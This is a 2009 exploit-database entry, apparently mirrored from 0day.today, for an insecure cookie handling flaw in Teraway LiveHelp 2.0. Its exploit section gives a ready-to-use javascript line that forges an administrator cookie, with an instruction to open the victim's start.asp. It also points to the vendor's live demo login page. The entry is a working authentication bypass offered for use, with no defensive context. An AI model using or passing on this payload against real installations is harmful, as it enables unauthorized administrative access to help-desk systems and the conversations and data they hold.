id: 5110
date: 04/26/2009
title: Teraway LiveHelp 2.0 Insecure Cookie Handling Vulnerability
author: ThE g0bL!N
cves: 

===========================================================
Teraway LiveHelp 2.0 Insecure Cookie Handling Vulnerability
===========================================================


-------------------------------------[+]
Homepage:http://www.teraway.com
Product: Teraway LiveHelp 2.0
-------------------------------------
Teraway LiveHelp 2.0 Insecure Cookie Handling Vuln
-------------------------------------
Exploit:
--------

javascript:document.cookie="TWLHadmin=pwd=&lvl=1&usr=&alias=admin&userid=1;path=/";
Then Go to  http://victim/path/start.asp

demo
----
http://www.teraway.com/livehelp/demo/login.asp


--------------------------------------------------



#  0day.today [2023-03-25]  #